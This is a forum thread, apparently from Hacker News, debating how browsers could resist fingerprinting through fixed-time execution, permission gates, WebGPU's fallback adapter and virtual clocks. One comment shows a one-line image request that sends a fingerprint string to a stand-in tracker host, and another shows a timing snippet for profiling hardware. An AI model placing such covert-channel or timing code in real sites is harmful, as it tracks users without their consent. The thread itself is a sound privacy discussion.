
It's possible to have the runtime execute the computations in fixed time across platforms.



Sure. And nobody actually wants that, because it would be so restrictive in practice that you might as well just limit yourself to plain text.

The horse bolted long ago; there's little sense in trying to prevent future web platform features from enabling fingerprinting, because the existing surface that enables it is way too big to do anything meaningful about it.

Here are a couple of more constructive things to do:

- Campaign to make fingerprinting illegal in as many jurisdictions as possible. This addresses the big "legitimate" companies.

- Use some combination of allow-listing, deny-listing, and "grey-listing" to lock down what untrusted websites can do with your browser. I'm sure I've seen extensions and Pi-hole-style products for this. You could even stop your browser from sending anything to untrusted sites except simple GET requests to pages that show up on Google, i.e. make it harder for them to smuggle information back to the server. (A rough sketch of such a rule follows this list.)

- Support projects like the Internet Archive that enable viewing large parts of the web without ever making a request to the original server.
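
As a rough sketch of the grey-listing rule above (the domain names are hypothetical placeholders; a real allow-list would be user-maintained), a Manifest V3 extension with the "declarativeNetRequest" permission could block every non-GET request outside a trusted set:

    // background.js — block non-GET requests everywhere except allow-listed sites.
    chrome.declarativeNetRequest.updateDynamicRules({
      removeRuleIds: [1], // replace any previous version of this rule
      addRules: [{
        id: 1,
        priority: 1,
        action: { type: "block" },
        condition: {
          excludedRequestDomains: ["news.ycombinator.com", "archive.org"],
          requestMethods: ["post", "put", "patch", "delete", "connect"]
        }
      }]
    });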


This would essentially mean that every computation would have to run as slow as the slowest supported hardware. It would completely undermine the entire point of supporting hardware acceleration.

I’m sympathetic to the privacy concerns, but this isn’t a solution worth considering.


The solution is to put unnecessary features like WebGL, the programmatic Audio API, reading bits back from a canvas, and WebRTC behind a permission.


Who decides what's unnecessary?


Everything that can be used for fingerprinting should be behind a permission. Almost all sites I use (like Google, Hacker News, or YouTube) need none of those technologies.


The main thing that ought to be behind a permission is letting JavaScript initiate connections or modify anything that might be sent in a request. It should be possible, but ought to require asking first.

If the data can't be exfiltrated, who cares if they can fingerprint?

Letting JS communicate with servers without the user's explicit consent was the original sin of web dev, the one that ruined everything. It turned the web from a user-controlled experience into one giant spyware service.


If JavaScript can modify the set of URLs the page can access (e.g. put an image tag on the page or tweak what images need to be downloaded using CSS) then it can signal information to the server. Without those basic capabilities, what's the point of using JavaScript?
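
For example (fp here is a hypothetical fingerprint string computed earlier), a single image assignment is already a covert channel, and no DOM insertion is even needed:

    const img = new Image();
    img.src = "https://tracker.example/p.gif?fp=" + encodeURIComponent(fp);
    // the browser sends the GET the moment src is assigned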


So CSS should be behind a permission?


CSS should not leak fingerprinting information. After all, it's just a set of rules for laying out blocks on the page.



No video driver is actually going to implement fixed-time rendering. So you'd have to implement it in user space, and it would be even slower than WebGL. Nobody wants that. You're basically just saying the feature shouldn't ship, in an indirect way (which is a valid opinion you should just express directly).


I don't mean to prescribe the way to stop fingerprinting; I'm just throwing out a trivial existence proof, and maybe a starting point for thinking, that it's not impossible as was suggested.

Also, WebGPU seems to conceptually support software rendering (the "fallback adapter"), where fixed-time rendering would seem to be possible even without cooperation from hardware drivers. Being slower than WebGL might still be an acceptable tradeoff, at least if the alternative fingerprinting avenue through the WebGL API could be plugged.
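
For what it's worth, WebGPU already exposes a knob for the software path. A minimal sketch, assuming a browser with WebGPU enabled and running in a module context (the adapter.info attribute is relatively new in the spec):

    // Ask for the software "fallback adapter" instead of real GPU hardware.
    const adapter = await navigator.gpu.requestAdapter({
      forceFallbackAdapter: true,
    });
    if (adapter) {
      // e.g. a CPU rasterizer such as SwiftShader, depending on the browser
      console.log(adapter.info.description);
    }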


Could you explain what techniques would make this possible? I can see how it's possible in principle, if you, say, compile JS down to bytecode and then have the interpreter pad the execution of every instruction to a fixed duration. I don't immediately see a way to do it that's compatible with any kind of efficient execution model.


The rest would be optimization while keeping the timing side-channel constraint in mind; it's hard to say what the performance possibilities are. For example, not all computations have externally observable side effects, so those parts could be executed conventionally if the runtime could guarantee it. Or the program-visible clock APIs might keep a virtual time that makes operations look slower, timing-wise, than they really are, combined with network API checkpoints that halt execution until real time catches up with the virtual time. Etc. Seems like an interesting research area.
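
A very rough sketch of the virtual-clock part (every name and the per-op cost here are made up for illustration; a real engine would do this inside the runtime, not in page JS):

    let virtualMs = 0;                     // the only clock scripts get to see
    const realStart = performance.now();   // wall clock at program start
    const COST_PER_OP = 0.001;             // fixed virtual charge per operation

    function chargeOp() { virtualMs += COST_PER_OP; } // runtime calls this per op
    function virtualNow() { return virtualMs; }       // backs performance.now() etc.

    async function networkCheckpoint() {
      // Before anything externally visible happens, stall until wall-clock
      // time has caught up with the (deliberately pessimistic) virtual time.
      const deficit = virtualMs - (performance.now() - realStart);
      if (deficit > 0) await new Promise(resolve => setTimeout(resolve, deficit));
    }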


>not all computations have externally observable side effects

You can time any computation. So they all have that side effect.

Also, from JavaScript you can execute tons of C++ code (e.g. via DOM manipulation). There's no way all of that native code can be guaranteed to run with consistent timing across platforms.
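
For example, even an innocuous DOM read forces the browser's native layout engine to run synchronously inside the measured window:

    const el = document.createElement("div");
    document.body.appendChild(el);
    el.style.width = "50%";
    const w = el.offsetWidth; // forces a synchronous reflow in native (C++) code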


Depends on who you mean by "you". In the context of fingerprinting resistance, the timing would have to be done by page code in certain limited ways, using browser APIs or side channels that transmit information outside the JS runtime.

Computations that call into native APIs can be put in the "has observable side effects" category (though in a more fine-grained treatment, some could get more specific handling).


I'm not sure what you mean. All you need to do is this:

    function computation() { /* any computation to be timed */ }
    const before = performance.now();
    computation();
    const t = performance.now() - before; // t reveals how fast this hardware runs it
(Obviously there will be noise, and you need to average a bunch of runs to get reliable results.)


In this case the runtime would not be able to guarantee that the timing has no externally observable side effects (at least if you do something with t). It would then run in the fixed execution speed mode.


Lots of code accesses the current time. So I think you'd end up just running 90% of realistic code in the fixed execution speed mode, which wouldn't be sufficiently performant.


The runtime doesn't have full control, but it could introduce a lot of noise into timing and performance. Could that help?


It's hard to reason about how much noise is guaranteed to be enough, because it depends on how much measurement the adversary has a chance to do; there could be collusion between several sites, etc. To allow timing API usage, I'd be more inclined toward the virtual time thing I mentioned upthread.



